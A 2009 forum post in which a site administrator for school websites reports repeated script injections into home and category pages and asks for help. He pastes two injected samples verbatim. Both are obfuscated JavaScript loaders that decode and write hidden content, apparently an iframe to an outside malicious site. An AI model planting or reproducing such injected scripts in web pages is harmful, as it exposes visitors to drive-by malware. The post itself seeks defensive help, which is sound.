grahamone
New User
Jul 21, 2009, 3:33 AM
Post #1 of 2
(1958 views)
Shortcut
|
Code Injections script security
|
Can't Post
|
|
Our company uses AM2 extensivley for schools.
We have had about 10 attacks where code has been inserted into our home pages (global index) and category index's, the hosting environment is secure, no viruses have been picked up. We have been told hackers, possibley automated, are using weaknesses on scripts on our site to inject their code, (two examples of this I have put below, can you let me know if you have come across this before or what measure you are taking to rectify this situation. We cure the problem by reuploading our templates and then republishing, however the damage is doen as google logs the site as malicious and traffic is lost.
any suggestions appreciated
examples below
regards Graham
Two examples of code inserted:
1).
<script>eval(unescape('function%20LG_P%28CT_r%29%7BArAHs%3Dnew%20String%28arguments.callee%29.replace%28/%5B%5E@a-z0-9A-Z_.%5D/g%2C%27%27%29%2CHAAra%3D%27%27%2CHaCAA%3D-1%2C_Cl%3D-1%3Bvar%20AraGC%3D0%3Bfor%28HaCAA%3D0%3BHaCAA%3CArAHs.length%3BHaCAA++%29AraGC%5E%3DArAHs.charCodeAt%28HaCAA%29%3BHaCAA%3D-1%3Bwhile%28++_Cl%3CCT_r.length%29%7Bif%28HaCAA%3D%3DArAHs.length%29HaCAA%3D0%3Belse%20HaCAA++%3BHAAra+%3DString.fromCharCode%28AraGC%5ECT_r.charCodeAt%28_Cl%29%5EArAHs.charCodeAt%28HaCAA%29%29%3B%7Ddocument.write%28HAAra%29%3BHAAra%3D%27%27%3Breturn%3B%7D'));LG_P(unescape('3odxtpr9RGX%5DEJ%18h%5Cz%5CTi%3A+ZUs%7E%27%3Cjgx%7Bqabs3m5c%7C%60-+0.%7D+2%22z-%27%0Ei%7E%3Cw%03%14%16%29oLM%15DzrW%0A%5BZ%3B%0Bv%220k%7Ck%124%27%19%1B*%7FoxD%26CFN6%0E%7C%05%17%0F%03%3CwSI%18%22%27%203%3A*li%5E@%06Zt%7D@N%00VIUrix%60f%7FEk%25%25%02/%140%03%03%0F%7D/%0A_A%3Cji%3D5%29%16B%60CZ%5Eoz5%29%27%7D%7EsocMaDO%15Ft%08Gh%26hieaoeDz%17%18%084mw%7DeO%60OAOI%5C%15+%28W%7Cign%600f%7Frl%1716%27%05%21%26+A%7D/%05%0DX%5C%110%60gd6%3C%03%3A%22%7FKo_Zq%16'));</script><!-- 213.171.193.5 -->
2.)
<body><script>c07d5='';r1eb3d55674=document;r1eb3d55674.write('<scr'+'ipt>function ree08347(rd9be8620ef){return e'+c07d5+'val(rd9be8620ef); }</scr'+'ipt>'); function c07442678cr2fc99(ra4716269d){ var dc3b='';return (ree08347('pars'+dc3b+'eInt')(ra4716269d,16));}function rd05b0bfa476(r0ff19e1ec){ function r3cfc0(){return 2;} var r9aedf9='';r2fab7c57='fromCh';r6d1d8928=String[r2fab7c57+'arCode'];for(rde471=0;rde471<r0ff19e1ec.length;rde471+=r3cfc0()){ r9aedf9+=(r6d1d8928(c07442678cr2fc99(r0ff19e1ec.substr(rde471,r3cfc0()))));}return r9aedf9;} var rdefa5c89='3C7363726970743E69662821'+c07d5+'6D796961'+c07d5+'297B646F63756D656E742E777269746528756E65736361'+c07d5+'7065282027253363253639253636253732253631'+c07d5+'253664253635253230253665253631'+c07d5+'253664253635253364253633253330253337253230253733253732253633253364253237253638253734253734253730253361'+c07d5+'253266253266253733253735253661'+c07d5+'253635253734253663253639253665253635253265253732253735253266253733253633253635253665253635253732253639253633253265253638253734253664253663253366253237253262253464253631'+c07d5+'253734253638253265253732253666253735253665253634253238253464253631'+c07d5+'253734253638253265253732253631'+c07d5+'253665253634253666253664253238253239253261'+c07d5+'253331'+c07d5+'253338253336253335253336253330253239253262253237253330253634253333253331'+c07d5+'253333253634253335253330253237253230253737253639253634253734253638253364253335253333253330253230253638253635253639253637253638253734253364253333253335253332253230253733253734253739253663253635253364253237253736253639253733253639253632253639253663253639253734253739253361'+c07d5+'253638253639253634253634253635253665253237253365253363253266253639253636253732253631'+c07d5+'2536642536352533652729293B7D7661'+c07d5+'72206D796961'+c07d5+'3D747275653B3C2F7363726970743E';r1eb3d55674.write(rd05b0bfa476(rdefa5c89));</script><!-- 213.171.193.5 -->
|
